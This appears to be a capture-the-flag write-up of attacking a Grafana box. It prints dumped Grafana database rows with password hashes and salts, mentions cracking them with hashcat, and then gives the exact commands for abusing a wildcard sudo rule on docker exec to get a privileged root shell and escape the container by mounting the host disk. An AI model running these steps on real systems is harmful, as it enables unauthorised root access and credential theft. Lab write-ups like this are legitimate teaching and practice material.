Grafana
DB credentials (in /var/lib/grafana/grafana.db)
333borisboris@data.vlborisdc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8LCBhdtJWjlmYl941ma8w2022-01-23
333adminadmin@localhost7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8YObSoLj55ShLLY6QQ4Y62022-01-23
sha256:10000:WU9iU29MajU1Uw==:epGeS76Vz1EE7fNU7i5iNO+sHKH4FCaESiTE32ExMizzcjySFkthcunnP696TCBy+Pg=
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=
Cracking Hashes
With hashcat, I get this credential:
Privesc
After running linpeas, we can see that boris can run a specific command as root
And because there is the wildcard, we can add WHATEVER options we want to the command
First, we need to find a running container to execute a bash on it with privileges (--privileged)
> ps aux | grep "docker"
...
root 1627 0.0 0.8 712860 8284 ? Sl 22:36 0:00 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 -address /run/snap.docker/containerd/containerd.sock
...
We have now the ID of the container:
e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81
So, letβs go run the command:
sudo /snap/bin/docker exec --privileged -u 0 -it e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 bash
Bingo!
Now, we need to find a way to escape the docker container.
I follow some blogs / resources to learn a lot about this way of privesc
Finally, I found a way to escape it thanks to the --privileged flag:
bash-5.1# fdisk -l
Disk /dev/xvda: 8192 MB, 8589934592 bytes, 16777216 sectors
6367 cylinders, 85 heads, 31 sectors/track
Units: sectors of 1 * 512 = 512 bytes
Device Boot StartCHS EndCHS StartLBA EndLBA Sectors Size Id Type
/dev/xvda1 * 0,32,33 20,84,31 2048 16777182 16775135 8190M 83 Linux
bash-5.1# mkdir -p /mnt/hola
bash-5.1# mount /dev/xvda1 /mnt/hola
We can now access to the host filesystem in the hola directory
PWNED π
